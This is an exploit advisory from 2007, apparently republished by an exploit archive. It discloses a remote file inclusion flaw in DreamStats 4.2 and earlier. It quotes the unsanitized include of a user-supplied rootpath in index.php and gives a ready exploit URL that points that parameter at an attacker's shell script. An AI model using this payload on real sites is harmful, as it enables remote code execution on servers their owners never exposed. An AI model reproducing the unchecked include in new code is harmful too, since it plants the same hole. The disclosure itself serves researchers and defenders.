id: 1466
date: 02/02/2007
title: CoD2: DreamStats <= 4.2 (index.php) Remote File Include Vulnerability
author: ThE dE@Th
cves: 

=====================================================================
CoD2: DreamStats <= 4.2 (index.php) Remote File Include Vulnerability
=====================================================================



Discovered By:- ThE dE@Th <<{AsB-MaY DiScOvEr ExPlIoTs TeAm}>>
******************************************************************************
index.php:-
if (!$slots) {include($rootpath . 'html/serveroffline.php');exit;}
********************************************************************************
ExPlOiT:-http://www.Site.com/PaTh/index.php?rootpath=[Shell]
********************************************************************************



#  0day.today [2023-03-22]  #